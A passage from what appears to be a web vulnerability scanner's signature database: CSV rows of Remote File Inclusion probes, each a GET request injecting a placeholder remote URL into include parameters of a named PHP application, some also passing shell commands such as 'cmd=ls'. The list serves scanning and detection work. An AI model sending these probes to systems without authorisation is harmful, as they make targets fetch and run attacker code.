(RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005142\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?project=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005143\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?repinc=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005144\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?root_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005145\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?root_prefix=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005146\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?section=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005147\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005148\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?site_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005149\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?styl[top]=@RFIURL??\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005150\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?template=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005151\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?templates_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005152\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?theme=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005153\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?themepath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005154\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?themesdir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005155\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?this_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005156\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?txt=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005157\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?up=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005158\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?url=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005159\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?w=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005160\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?way=@RFIURL??????????????\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005161\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index1.php?=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005162\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index1.php?inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005163\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index1.php?inhalt=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005164\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index2.php?=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005165\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index2.php?content=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005166\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index2.php?s=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005167\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index2.php?x=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005168\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/indexinfo.php?bibtexrootrel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005169\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/indexk.php?lib_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005170\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/info.php?file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005171\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inhalt.php?dateien[news]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005172\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/init.php?API_HOME_DIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005173\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/init.php?scriptpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005174\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/initialize.php?hmail_config[includepath]=@RFIURL&cmd=dir\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005175\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/initiate.php?abs_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005176\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/install.php?_NE[AbsPath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005177\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/install.php?install_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005178\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/install/config.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005179\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/install/di.php?pathtoserverdata=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005180\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/install/index.php?content_php=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005181\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/install/install3.php?database=none&cabsolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005182\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/integration/shortstat/configuration.php?SPL_CFG[dirroot]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005183\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005184\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005185\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/interface/billing/billing_process.php?srcdir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005186\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/interface/editors/-custom.php?bField[bf_data]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005187\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/interface/editors/custom.php?bField[bf_data]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005188\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/interface/new/new_patient_save.php?srcdir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005189\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/intern/admin/?rootdir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005190\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/intern/admin/other/backup.php?admin=1&rootdir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005191\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/intern/clan/member_add.php?rootdir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005192\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/intern/config/forum.php?rootdir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005193\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/intern/config/key_2.php?rootdir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005194\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ip.inc.php?type=1&cgipath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005195\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ipeer_site/?page=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005196\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/joinus.php?vwar_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005197\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/joinus.php?vwar_root=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005198\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005199\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/joomla_path/components/com_articles.php?absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005200\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/js/bbcodepress/bbcode-form.php?BBCODE_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005201\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/js/wptable-tinymce.php?ABSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005202\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/jscript.php?my_ms[root]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005203\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/kernel/class/ixpts.class.php?IXP_ROOT_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005204\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/kernel/loadkernel.php?installPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005205\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/kmitaadmin/kmitam/htmlcode.php?file=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005206\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/kmitaadmin/kmitat/htmlcode.php?file=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005207\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ktmlpro/includes/ktedit/toolbar.php?dirDepth=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005208\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lang/leslangues.php?fichier=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005209\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lang_english/lang_main_album.php?phpbb_root_path=@RFIURL?a=\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005210\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/language/lang_english/lang_activity.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005211\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/language/lang_english/lang_admin_album.php?phpbb_root_path=@RFIURL?a=\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005212\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/language/lang_german/lang_admin_album.php?phpbb_root_path=@RFIURL?a=\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005213\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/language/lang_german/lang_main_album.php?phpbb_root_path=@RFIURL?a=\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005214\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/latestposts.php?forumspath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005215\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/latex.php?bibtexrootrel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005216\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/layout/default/params.php?gConf[dir][layouts]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005217\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ldap/authldap.php?includePath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005218\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/learnPath/include/scormExport.inc.php?includePath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005219\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib.editor.inc.php?sys_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005220\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/Loggix/Module/Calendar.php?pathToIndex=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005221\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/Loggix/Module/Comment.php?pathToIndex=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005222\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/Loggix/Module/Rss.php?pathToIndex=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005223\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/Loggix/Module/Trackback.php?pathToIndex=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005224\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/action/rss.php?lib=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005225\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/activeutil.php?set[include_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005226\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/addressbook.php?GLOBALS[basedir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005227\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/armygame.php?libpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005228\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/authuser.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005229\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/base.php?BaseCfg[BaseDir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005230\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/connect.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005231\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/connected_users.lib.php3?ChatPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005232\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/connected_users.lib.php3?ChatPath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005233\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/db/mysql.class.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005234\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/db/postgres.class.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005235\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/functions.php?DOC_ROOT=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005236\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/googlesearch/GoogleSearch.php?APP[path][lib]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005237\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/header.php?DOC_ROOT=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005238\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/language.php?_LIB_DIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005239\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/live_status.lib.php?ROOT=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005240\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/misc.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005241\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/nl/nl.php?g_strRootDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005242\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/obj/collection.class.php?GLOBALS[application][app_root]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005243\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/obj/content_image.class.php?GLOBALS[application][app_root]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005244\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005245\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/pcltrace.lib.php?g_pcltar_lib_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005246\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/rs.php?rootpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005247\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/selectlang.php?BBC_LANGUAGE_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005248\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/smarty/SmartyFU.class.php?system[smarty][dir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005249\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/smarty/SmartyFU.class.php?system[smarty][dir]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005250\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/static/header.php?set_menu=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005251\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lib/tpl.inc.php?conf[classpath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005252\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/libraries/comment/postComment.php?path[cb]=@RFIURL?a=\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005253\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/libraries/database.php?path=@RFIURL???\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005254\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005255\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/libraries/pcl/pcltar.php?g_pcltar_lib_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005256\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/library/authorize.php?login_form=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005257\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/library/translation.inc.php?GLOBALS[srcdir]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005258\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/libs/db.php?path_local=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005259\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/libs/ftp.php?path_local=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005260\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/libs/lom.php?ETCDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005261\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/libsecure.php?abs_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005262\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/license.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion 